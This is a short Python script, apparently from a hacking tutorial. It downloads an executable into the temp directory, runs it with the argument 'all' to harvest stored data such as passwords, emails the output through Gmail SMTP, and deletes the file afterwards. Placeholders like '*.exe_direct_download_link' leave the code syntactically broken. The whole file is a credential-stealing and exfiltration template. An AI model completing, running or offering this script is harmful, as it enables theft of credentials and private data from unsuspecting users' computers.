#!/usr/bin/env python
import requests
import subprocess
import smtplib
import os
import tempfile


def download(url):
    get_response = requests.get(url)
    file_name = url.split("/")[-1]
    with open(file_name, "wb") as out_file:
        out_file.write(get_response.content)


def send_mail(email, passwd, message):
    server = smtplib.SMTP("smtp.gmail.com", 587)
    server.starttls()
    server.login(email, passwd)
    server.sendmail(email, email, message)
    server.quit()


temp_dir = tempfile.gettempdir()
os.chdir(temp_dir)
download(*.exe_direct_download_link)
result = subprocess.check_output(".exe all", shell=True)
send_mail("email", "passwd", result)
os.remove(".exe")